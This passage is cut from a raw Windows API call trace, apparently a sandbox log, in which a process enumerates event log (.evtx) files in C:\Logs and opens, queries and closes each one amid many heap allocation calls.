"c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.574] GetFileType (hFile=0x424) returned 0x1 [0087.574] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0087.574] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.574] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.574] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.574] CloseHandle (hObject=0x424) returned 1 [0087.574] AreFileApisANSI () returned 1 [0087.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0087.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75be8 [0087.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 53 [0087.575] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.575] GetFileType (hFile=0x424) returned 0x1 [0087.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.575] CloseHandle (hObject=0x424) returned 1 [0087.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0087.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0087.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0087.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0087.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0087.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0087.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0087.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.575] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.575] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0087.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.576] AreFileApisANSI () returned 1 [0087.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0087.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76188 [0087.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=53 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 53 [0087.576] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50981e6e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50981e6e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0087.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0087.576] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.576] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.576] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5095bc04, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5095bc04, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cAlternateFileName="MIBD88~1.EVT")) returned 1 [0087.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0087.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0087.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0087.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0087.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0087.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45fd8 [0087.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0087.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0087.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0087.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0087.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0087.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0087.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0087.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0087.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0087.576] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.576] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0087.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0087.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0087.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0087.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0087.577] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.577] AreFileApisANSI () returned 1 [0087.577] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx", lpUsedDefaultChar=0x0) returned 54 [0087.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0087.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.577] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0087.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0087.577] AreFileApisANSI () returned 1 [0087.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0087.577] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75eb8 [0087.578] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 54 [0087.578] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.578] GetFileType (hFile=0x424) returned 0x1 [0087.578] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0087.578] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.578] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.578] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.579] CloseHandle (hObject=0x424) returned 1 [0087.579] AreFileApisANSI () returned 1 [0087.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0087.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75fa8 [0087.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 54 [0087.579] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.579] GetFileType (hFile=0x424) returned 0x1 [0087.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0087.579] CloseHandle (hObject=0x424) returned 1 [0087.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.579] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.579] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0087.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0087.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0087.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0087.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.580] AreFileApisANSI () returned 1 [0087.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0087.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75d50 [0087.580] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x75d50, cchWideChar=54 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 54 [0087.580] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5095bc04, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5095bc04, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0087.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0087.580] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.580] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.580] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b97f64, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b97f64, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cAlternateFileName="MICC17~1.EVT")) returned 1 [0087.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69030 [0087.580] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.580] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0087.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69030 | out: hHeap=0x20000) returned 1 [0087.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c650 [0087.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0087.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0087.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0087.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0087.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0087.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0087.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0087.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0087.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0087.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0087.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0087.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0087.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0087.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0087.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0087.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0087.581] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.581] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.581] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.581] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0087.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0087.581] AreFileApisANSI () returned 1 [0087.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", lpUsedDefaultChar=0x0) returned 66 [0087.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0087.582] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.582] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0087.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0087.582] AreFileApisANSI () returned 1 [0087.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0087.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x84) returned 0x82b98 [0087.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x82b98, cchWideChar=66 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 66 [0087.582] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.582] GetFileType (hFile=0x424) returned 0x1 [0087.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82b98 | out: hHeap=0x20000) returned 1 [0087.582] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.583] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.583] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.583] CloseHandle (hObject=0x424) returned 1 [0087.583] AreFileApisANSI () returned 1 [0087.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0087.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 